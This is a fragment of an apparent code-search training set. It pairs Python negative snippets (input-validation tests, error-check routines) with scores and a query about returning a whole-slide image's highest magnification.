draw.AreaRectangle, x=\"1cm\", height=\"1cm\", width=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", height=\"1cm\", width=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", x=\"1cm\", height=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", x=\"1cm\", width=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPath, recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", d=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPath, recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", d=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPolygon, points=\"0,0 1,1\", recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPolygon, points=\"0,0 1,1\", recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.FillImage, href=\"1cm\", name=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.FillImage, href=\"1cm\", name=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.GluePoint, x=\"1cm\", align=\"1cm\", id=\"1cm\", y=\"xxx\", escapedirection=\"right\" )\n self.assertRaises(ValueError, draw.GluePoint, y=\"1cm\", align=\"1cm\", id=\"1cm\", x=\"xxx\", escapedirection=\"right\" )\n self.assertRaises(ValueError, draw.Line, x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x1=\"1cm\", y2=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", y2=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x1=\"1cm\", y2=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", y2=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.StrokeDash, name=\"1cm\", dots1length=\"xxx\" )\n self.assertRaises(ValueError, draw.StrokeDash, name=\"1cm\", dots2length=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, x=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", x=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", x=\"1cm\", object=\"1cm\", width=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", endindent=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", spaceafter=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", spacebefore=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", startindent=\"xxx\" )\n self.assertRaises(ValueError, style.Columns, columncount=\"1cm\", columngap=\"xxx\" )\n self.assertRaises(ValueError, style.TabStop, position=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, svg.Radialgradient, name=\"1cm\", r=\"xxx\" )", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = \"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def test_check_map_errors(self):\r\n\r\n # Bad header\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_header)\r\n # non DNA characters\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dna)\r\n # Duplicate barcodes\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dup_bcs)\r\n # Duplicate SampleIDs\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dup_sids)\r\n # More than one SampleID, no barcodes or added demultiplex specified\r\n self.assertRaises(ValueError, check_map,\r\n self.valid_mapping_data_no_bcs_added_demultiplex, barcode_type=0)\r\n # No barcodes, added_demultiplex has duplicates\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_no_bcs_added_demultiplex, barcode_type=0,\r\n added_demultiplex_field=\"Added_Demultiplex\")\r\n # Barcodes plus added demultiplex results in duplications\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_bcs_added_demultiplex,\r\n added_demultiplex_field=\"Added_Demultiplex\")\r\n # Missing a barcode\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_missing_bc,\r\n barcode_type=\"variable_length\")", "def ensure_valid_data():\n cursor = connection.cursor()\n cursor.execute(\"SELECT id, name, st_area(geom) FROM firestation_firedepartment where st_area(geom)>6.99\")\n messages = []\n\n for id, name, area in cursor.fetchall():\n messages.append('{0} ({1}) has an area of {2}.'.format(name, id, area))\n\n if messages:\n mail_admins('Invalid Geometries Detected', message='\\n'.join(messages))\n\n cursor.execute(\"SELECT COUNT(*) FROM genericm2m_relatedobject;\")\n generic_count = cursor.fetchone()\n\n if generic_count[0] < 2940:\n generic_count_message = \"Related government units has dropped below 2,940.\"\n mail_admins('Low number of government units alert.', message=generic_count_message)", "def test_should_raise_in_case_of_wrong_initials(self):\n validator = StartsWithValidator()\n\n for formula in self.wrong_formulas:\n with self.assertRaises(FormulaValidationError):\n validator(formula)", "def test_kraus_error(self):\n A0 = [[1, 0], [0, np.sqrt(1 - 0.3)]]\n A1 = [[0, 0], [0, np.sqrt(0.3)]]\n targets = [A0, A1]\n error = kraus_error(targets)\n circ, p = error.error_term(0)\n self.assertEqual(p, 1)\n kraus = circ[0]\n self.assertEqual(kraus['name'], 'kraus')\n self.assertEqual(kraus['qubits'], [0])\n for op in kraus['params']:\n self.remove_if_found(op, targets)\n self.assertEqual(targets, [], msg=\"Incorrect kraus QuantumError\")", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 6, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 6, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def test_invalid_request_values(self):\n TEST_DATA = [\n (-100, 0, 0, 0),\n (100, 0, 0, 0),\n (0, -190, 0, 0),\n (0, 190, 0, 0),\n (0, 0, 0, -10),\n (0, 0, 0, 370)\n ] # yapf: disable\n for (lat, lon, alt, heading) in TEST_DATA:\n self.assertEqual(400,\n self.eval_request_values(lat, lon, alt, heading))", "def checkResultsCorrection(self, result, valid_keys):\n for key in result:\n if key not in valid_keys:\n print(\"[ERROR] Key '%s' does not exist.\" % key)\n return False\n return True", "def listErrors(individual): #TODO: add other errors implemented elsewhere\n\n results = [birthBeforeMarriage(individual), birthBeforeDeath(individual), marriageBeforeDeath(individual), \n datesBeforeCurrentDate(individual), noBigamy(individual)]\n results = [x for x in results if x is not None]\n return not all(results)", "def check_validity(self):", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 4, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def errorCheck(self):\n\t\twhile 1:\n #check for bad state\n\t\t\tif epics.caget(self.error_bypass) == 1:\n\t\t\t\tout_msg=\"Bypass flag is TRUE\"\n elif epics.caget(self.error_bcs) != 1:\n out_msg=\"BCS tripped\"\n elif epics.caget(self.error_mps) != 0:\n out_msg=\"MPS tripped\"\n elif epics.caget(self.error_gaurdian) != 0:\n out_msg=\"Gaurdian tripped\"\n\t\t\n #elif epics.caget(self.error_und_tmit) < 5.0e7:\n # out_msg=\"UND Tmit Low\"\n else:\n out_msg='Everything Okay'\n\n #exit if the stop button is set\n #if not self.mi.getter.caget(\"SIOC:SYS0:ML03:AO702\"):\n\t\t\tif not epics.caget(\"SIOC:SYS0:ML03:AO702\"):\n break\n\n #set the error check message\n epics.caput (\"SIOC:SYS0:ML00:CA000\",out_msg)\n print out_msg\n\n #break out if error check is bypassed\n if (out_msg==\"Bypass flag is TRUE\"):\n break\n\n #break out if everything is okay\n if (out_msg==\"Everything Okay\"):\n epics.caput(self.error_tripped,0)\n break\n\t\t\t\t#return\n else:\n epics.caput(self.error_tripped,1)\n time.sleep(0.1)", "def test_err(self, start: Result[int, str], exp: Option[str]) -> None:\n assert start.err() == exp", "def test_value_init7(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(-4, 5)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def testCCHalt(self):\n cdl_convert.config.HALT_ON_ERROR = True\n\n def getCC():\n self.ccr_bad.cc\n\n self.assertRaises(\n ValueError,\n getCC\n )", "def test_051128_invalid(self):\n spc = parser(get_file('PTSDY1_biggeom2.txt'))\n # spc.draw_outlooks()\n spc.sql(self.txn)\n outlook = spc.get_outlook('WIND', 'SIGN', 1)\n self.assertTrue(outlook.geometry.is_empty)\n self.assertEquals(len(spc.warnings), 2, \"\\n\".join(spc.warnings))", "def test_execution_errors():\n with temporary_dir() as output_dir:\n copyfile(\n TEST_ROBOT_OUTPUT_FILES / \"robot_with_import_errors.xml\",\n Path(output_dir) / \"output.xml\",\n )\n robot_importer.import_robot_test_results(FlowTaskFactory(), output_dir)\n\n test_result = models.TestResult.objects.last()\n root = ET.fromstring(test_result.robot_xml)\n msg_elements = root.findall(\"./errors/msg\")\n error_messages = [element.text for element in msg_elements]\n\n expected_error_messages = [\n # note: these are glob patterns, not regexes\n \"Error in file '*' on line 2: Library setting requires value.\",\n \"Error in file '*' on line 3: Resource setting requires value.\",\n ]\n assert len(error_messages) == len(expected_error_messages)\n for pattern in expected_error_messages:\n assert len(fnmatch.filter(error_messages, pattern)) == 1", "def test_bad_values(self):\n self.assertOK([60])\n self.assertRaisesInternalError([59.9])\n self.assertRaisesInternalError([''])\n self.assertRaisesInternalError([';'])\n self.assertRaisesInternalError(['('])\n self.assertRaisesInternalError([None])", "def test_errors(self):\n self.assertRaises(TypeError, columnize, 5, 'reject input - not array')\n return", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def CheckErrors(self, index=None):\n loc = 'Coordinated video timing block %s' % ('#%d' % index if index else '')\n errors = []\n\n # Check that preferred refresh rate is supported\n if self.preferred_vertical_rate not in self.supported_vertical_rates:\n errors.append(error.Error(loc, 'Preferred refresh rate not supported',\n '%s supported' % self.preferred_vertical_rate,\n 'Supported: %s' %\n self.supported_vertical_rates))\n\n # Check for reserved 0 bits\n if self._block[1] & 0x03:\n # Error: Bits 1-0 of byte 2 in CVT should be set to '00'\n errors.append(error.Error(loc, 'Bits 1-0 of byte 2 incorrectly set',\n 0x00, self._block[1] & 0x03))\n\n if self._block[2] & 0x80:\n # Error: Bit 7 of byte 3 in CVT should be set to '0'\n errors.append(error.Error(loc, 'Bit 7 of byte 3 incorrectly set', 0x00,\n self._block[2] & 0x80))\n\n return errors", "def errors(self):\n return self.args[1]", "def validate():", "def test_invalid_filter_shape(self):\r\n self.assertRaises(AssertionError, self.validate,\r\n (3, 2, 8, 8), (4, 3, 5, 5),\r\n 'valid')", "def test_results_errors(self, affiliate_items):\n updater = mock.Mock(side_effect=ValueError())\n batch_job = BatchJob(affiliate_items, updater)\n\n error_count = 0\n for result in batch_job.run():\n error_count += int(result.is_error)\n\n assert error_count == 4", "def test_PerfectModel_verify_comparison_keyerrors(\n perfectModelEnsemble_initialized_control, comparison\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=comparison,\n metric=\"mse\",\n dim=[],\n )\n assert \"Specify comparison from\" in str(excinfo.value)", "def check_set_errors(self):\n response = self.read()\n return [] if response == \"\" else [response]", "def test_error(self):\n metric = self.metric()\n measurement = self.measurement(metric, sources=[self.source(metric, parse_error=\"error\")])\n self.assertEqual(None, measurement[\"count\"][\"value\"])", "def nzErr(xerr, yerr, vxerr, vyerr, year_x, year_y, mag, alnDir = '13_08_21/', chainsDir = 'efit/chains_S0-2_newRV2/'):\n\n #Read in values for error in position and velocity of sgr*\n origin_val = asciidata.open('/g/ghez/align/' + alnDir + chainsDir + 'efit_summary.txt')\n ori_x0e = origin_val[25][0]\n ori_y0e = origin_val[26][0]\n ori_vxe = origin_val[27][0]\n ori_vye = origin_val[28][0]\n t_0 = 2000.0 #hard coded t_0 of sgr*\n\n # magBins=np.array([9,11,12,13,14,15,16,17,18,19,20,21])\n # deltaArr=np.array([3.5,71.0,58.0,210.0,300.0,650.0,700.0,1100.0,1900.0,2200.0,3000.0])*1e-6\n\n# delta = mag*0.0\n# for i in range(len(mag)):\n# for j in range(len(deltaArr)):\n# if ((mag[i] > magBins[j]) & (mag[i] <= magBins[j+1])):\n# delta[i]=deltaArr[j]\n\n#pdb.set_trace()\n\n #Update errors\n xerr = np.sqrt(xerr**2 + ori_x0e**2 + ((year_x - t_0)*ori_vxe)**2)\n yerr = np.sqrt(yerr**2 + ori_y0e**2 + ((year_y - t_0)*ori_vye)**2)\n vxerr = np.sqrt(vxerr**2 + ori_vxe**2)\n vyerr = np.sqrt(vyerr**2 + ori_vye**2)\n\n return xerr, yerr, vxerr, vyerr", "def validError(treenode, impurity_crit, validSet):\n\t\t\tif treenode.cut_off is None:\n\t\t\t\tif len(validSet):\n\t\t\t\t\tif impurity_crit == DecisionTree._MSE:\n\t\t\t\t\t\treturn np.sum( np.square( validSet[:, -1] - treenode.value ) )\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn np.sum( validSet[:,-1] != treenode.value ) / len(validSet)\n\t\t\t\telse:\n\t\t\t\t\treturn 0.0\n\n\t\t\tD1, D2 = DecisionTree._binarySplit(validSet, *treenode.cut_off)\n\t\t\tleft_err = validError(treenode.left, impurity_crit, D1)\n\t\t\tright_err = validError(treenode.right, impurity_crit, D2)\n\n\t\t\treturn left_err + right_err", "def test_check_cds_11(self):\n self.cds1.start = -1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 1)", "def test_check_cds_12(self):\n self.cds1.stop = -1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 1)", "def test_failed_because_errors(self):\n with self.assertRaisesRegex(AssertionError,\n 'The follow messages were unexpectedly logged:\\n'\n ' ERROR:root:Divide by zero!\\n'\n ' ERROR:root:It is really not a good idea.'):\n with self.assertRaises(ZeroDivisionError):\n logging.getLogger().error(\n 'Should not be in AssertError before it was logged '\n 'with \"with self.assertNoLogs()\"')\n with self.assertNoLogs():\n divide_by(10, 0)", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n PCKAccuracy(norm_item='invalid')", "def _checkErrors(self, landPage):\n noLicenseTags = ['Purchase a Subscription',\n 'Purchase This Content',\n 'to gain access to this content',\n 'purchaseItem',\n 'Purchase Full Text',\n 'Purchase access',\n 'Purchase PDF',\n 'Pay Per Article',\n 'Purchase this article.',\n 'Online access to the content you have requested requires one of the following',\n 'To view this item, select one of the options below',\n 'PAY PER VIEW',\n 'This article requires a subscription.',\n 'leaf-pricing-buy-now',\n 'To access this article, please choose from the options below',\n 'Buy this article',\n 'Your current credentials do not allow retrieval of the full text.',\n 'Access to the content you have requested requires one of the following:',\n 'Online access to the content you have requested requires one of the following']\n if pageContains(landPage, noLicenseTags):\n logging.info(\"generic crawler found 'No license' on \" + landPage['url'])\n raise pubGetError('No License', 'noLicense', landPage['url'])\n errTags = ['This may be the result of a broken link',\n 'please verify that the link is correct',\n 'Sorry, we could not find the page you were looking for',\n 'We are now performing maintenance',\n 'DOI cannot be found in the DOI System']\n if pageContains(landPage, errTags):\n raise pubGetError('Error Message', 'errorMessage', landPage['url'])" ]
[ "0.68639857", "0.65659684", "0.6317057", "0.6280998", "0.624511", "0.62418723", "0.6231955", "0.6174314", "0.6160829", "0.6155387", "0.6125272", "0.61134624", "0.6105969", "0.60783327", "0.606288", "0.60506743", "0.604379", "0.6016345", "0.60074997", "0.6006396", "0.6003036", "0.5999768", "0.5980903", "0.5960872", "0.59525925", "0.5939286", "0.59228396", "0.5922243", "0.59138477", "0.59055305", "0.59030175", "0.5900376", "0.5899146", "0.5898229", "0.5893499", "0.58922726", "0.5881319", "0.58798444", "0.587429", "0.58731097", "0.58655345", "0.5856782", "0.5834021", "0.5833644", "0.58259577", "0.5817749", "0.58156997", "0.58139807", "0.5813697", "0.5797828", "0.57788426", "0.57751155", "0.5765215", "0.57581055", "0.57469225", "0.57466316", "0.57413006", "0.5735201", "0.57272196", "0.5724981", "0.5723203", "0.57157385", "0.5712788", "0.5707272", "0.5700087", "0.56969064", "0.56955403", "0.5695398", "0.5693497", "0.56868386", "0.56868386", "0.56859326", "0.5676572", "0.56753564", "0.5674813", "0.5673428", "0.5667035", "0.56643844", "0.5661131", "0.56559306", "0.5654298", "0.564797", "0.5646413", "0.56422025", "0.5640338", "0.56395143", "0.56297815", "0.56251127", "0.5623634", "0.5622698", "0.56202793", "0.56200314", "0.561971", "0.56155646", "0.56105214", "0.5609502", "0.56064075", "0.56030494", "0.5602576", "0.5602303" ]
0.73111194
0
Returns the highest magnification for the slide
def highest_mag(slide): return int(slide.properties['aperio.AppMag'])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def get_mag(self):\n raise NotImplementedError", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def largestResolution(resolutions):\n return resolutions[0]", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def maxResolution(self,wave = None):\n\n d = 2000.0*self.height*math.tan(self.angle/2) # Max pathlength in microns.\n dn = self.n.getDerivative(wave) # dn/dy of materail\n return d*dn #", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def sort_maxside(sprite):\n return max(sprite.width, sprite.height)", "def _get_max_estimated_bandit(self)->Bandit:\n # print(\"mus - \", self.mu)\n # print(\"actions - \", np.argmax(self.mu))\n unique, counts = np.unique(self.mu, return_counts=True)\n lens = counts[np.argmax(unique)] \n if lens>1: # if two actions have same argmax\n # then return arbitrarily from those max ones\n maxs = list(np.array(self.bandits)[self.mu==unique[np.argmax(unique)]])\n return np.random.choice(maxs)\n # otherwise return the max one\n return self.bandits[np.argmax(self.mu)]", "def getImageMax(self):\n fname = '%s::%s'%(self.__class__.__name__, self.getImageMax.__name__)\n if (not self.lhaveImage):\n print(\"%s: DSM image not yet computed\"%fname)\n return None, None\n maxIndex = c_int(1)\n maxValue = c_float(1)\n ierr = c_int(1)\n self.lib.xcloc_getImageMax(maxIndex, maxValue, ierr)\n if (ierr.value != 0):\n print(\"%s: Failed to get max value and index of DSM image\"%fname)\n return None, None\n imax = maxIndex.value - 1 # Fortran to C\n vmax = maxValue.value\n return imax, vmax", "def get_max_density(self):\n max_density = str(self.density.index(min(self.density)) + 1)\n print(max_density)\n return max_density", "def _maxAlien(self):\n maxA = 0\n for r in self._aliens:\n for y in r:\n if(y != None):\n maxA = max(maxA,y.x)\n return maxA", "def max(self):\r\n\t\treturn max(self.sample)", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def MaxSlMsd(self):\r\n\t\treturn self._get_attribute('maxSlMsd')", "def mag(self) -> complex:\n return self.major_extent", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def peak_height(self):\n return np.array([max(self.waveform[ch]) for ch in range(self.nchannels)])", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def findMax(img):\n\td = minMaxLoc(img)\n\treturn {\"maxVal\":d[\"maxVal\"], \"maxLoc\":d[\"maxLoc\"]}", "def _maximum(self) -> float:\n if self._type == \"power\":\n return 5.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_max\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def get_height_of_signal_maximum(\n data, setup={}, varname=None, gate_min=None, gate_max=None):\n idx = get_index_of_signal_maximum(\n data, setup, varname, gate_min, gate_max)\n nt = range(len(idx))\n return data['alt'][nt, idx]", "def get_max_gen():\n path = os.path.join(home, 'control', 'generations')\n gens = os.listdir(path)\n gens = [int(s.split('_')[-1]) for s in gens]\n max_gen = max(gens) \n return max_gen", "def max_well(self):\n maxVal = np.max(self.get_well_depth_image())\n return maxVal", "def maximum(self):\n return self.properties.get('maximum')", "def _get_maximum(self):\n return self._maximum", "def u_max(self):\n if self._u_max is None:\n return self.uv_max\n else:\n return self._u_max", "def get_lmax_limit(self):\n\n if self.pixel == \"HEALPIX\":\n l_max_limit = 3 * self.nside - 1\n elif self.pixel == \"CAR\":\n cdelt = self.data.wcs.wcs.cdelt[1]\n l_max_limit = 360 / cdelt / 4\n return l_max_limit", "def get_max(self):\n return self.max[-1]", "def find_max(subimage):\r\n\tmax_val_subimage = np.nanmax(subimage)\r\n\treturn max_val_subimage", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMaximum(self)", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT 